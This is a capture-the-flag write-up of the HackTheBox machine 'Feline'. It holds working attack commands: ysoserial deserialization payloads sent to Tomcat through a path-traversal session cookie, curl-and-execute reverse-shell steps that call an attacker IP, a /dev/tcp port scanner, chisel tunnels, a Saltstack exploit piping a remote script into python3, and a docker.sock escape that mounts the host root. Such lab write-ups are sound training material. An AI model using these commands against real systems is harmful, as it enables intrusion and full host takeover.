HackTheBox - Feline
Rustscan results
I am gonna use rustscan today to scan all the ports. It is one of the most powerful tool used nowadays to scan the all the ports in no time. It is comparatively faster than nmap.
It then runs nmap scan on the discovered ports to identify the services and version number.
Apache Tomcat is running on 8080 with a version number of 9.0.27
Checking out the web server
We have a file upload functionality at /service/index.html. The website is about adding email attachments to scan for viruses.
If we try to mess with the upload feature, we get the following error.
Apache Tomcat RCE by deserialization
Keeping that in mind, let's proceed. We can search for tomcat vulnerabilities on CVE MITRE. After searching on MITRE and google, I found this vulnerability. Read what the vulnerability is and how it was patched. We know the upload file location and also we can control the Cookie, that means we can exploit it.
Prerequisites (Taken from here)
There are a number of prerequisites for this vulnerability to be exploitable.
The
PersistentManageris enabled and it’s using aFileStoreThe attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
There are gadgets in the
classpaththat can be used for a Java deserialization attack
Creating Payload using ysoserial.jar
We need ysoserial.jar file to create a malicious file that we can upload to get RCE. Github repo is here and the package can be downloaded from here.
I will be using CommonsCollections2 payload to generate a Java serialized data.
java -jar ysoserial.jar CommonsCollections2 'ping -c 3 10.10.14.5' > ping.session
// Uploading the session file
curl -X POST http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../../opt/samples/uploads/ping" -F 'image=@ping.session'
// Triggering the session
curl http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../../opt/samples/uploads/ping"
Getting Reverse shell
Now that we have code execution, let's get a reverse shell. We will need two payloads, one to download the shell file and another one to execute it.
java -jar ysoserial.jar CommonsCollections2 'curl http://10.10.14.5:8000/shell.py -o /tmp/shell.py' > reverse.session
java -jar ysoserial.jar CommonsCollections2 'python3 /tmp/shell.py' > execute.session#!/bin/bash
echo "[+] Starting the exploit"
#Downloading the payload
curl -X POST http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/reverse" -F 'image=@reverse.session'
curl http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/reverse"
echo "[+] Wait 5 secs"
sleep 5
#Executing the payload
curl -X POST http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/execute" -F 'image=@execute.session'
curl http://feline.htb:8080/upload.jsp -H "Cookie: JSESSIONID=../../../../opt/samples/uploads/execute"
echo "[+] Completed"
Scanning the docker0 interface using nmap (Host Discovery)
We have docker0 interface running on the machine where we can search for more hosts. I will use static nmap binary to scan on that network.
./nmap -sn 172.17.0.1-255
Port scanning on docker container
We get a new host having IP Address of 172.17.0.2 which is a docker container running some kind of service. I will also scan for ports on this IP. A simple bash script to scan all the ports.
#!/bin/bash
ip=$1
if [[ $# -eq 0 ]];then
echo "[-] Supply IP Address"
exit 0
fi
for i in `seq 1 65535`;do
echo 1 > /dev/tcp/$ip/$i
if [[ $? -eq 0 ]];then
echo "[+] Port open: $i"
fi
done
Saltstack runs on port 4505 and 4506 (salt-master). Saltstack is a management software and remote execution engine widely used in devops field. Read more about it over here.
Forwarding ports using chisel
Firstly we need to forward all the ports using chisel. The ports that we are interested in are 4505 and 4506.
Our Local machine
./chisel server --reverse -p 9001Victim's machine
./chisel client 10.10.14.5:9001 R:4505:172.17.0.2:4505 &
./chisel client 10.10.14.5:9001 R:4506:172.17.0.2:4506 &
./chisel client 10.10.14.5:9001 R:8001:172.17.0.2:8000 &To check if it worked or not, we can use netstat command.
Saltstack 3000.1 - Remote Code Execution
A vulnerability, named CVE-2020-28243, was identified as a privilege escalation bug impacting SaltStack Salt minions. This allowed an unprivileged user to create files in any non-blacklisted directory via a command injection in a process name.
Get the code for exploit from here and as we already have 4505 and 4506 listening, we can run the script.
python3 exploit.py --exec "curl http://10.10.14.5:8000/shell.py | python3"
Writable docker socket (docker.sock)
As we have access to the docker.sock file, we can exploit it and probably get root access on host system. For that we need to understand all the docker endpoints on creating and managing containers.
Mounting the root (host) into the container
// Listing docker images: similar to docker images command
curl -X GET --unix-socket /var/run/docker.sock http://localhost/images/json
//Creating container: similar to docker run command
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/mnt/root"}]}' http://localhost/containers/create
//Starting the container
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<NewContainerID>/start
// Using socat to connect
socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<NewContainerID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
Last updated
Was this helpful?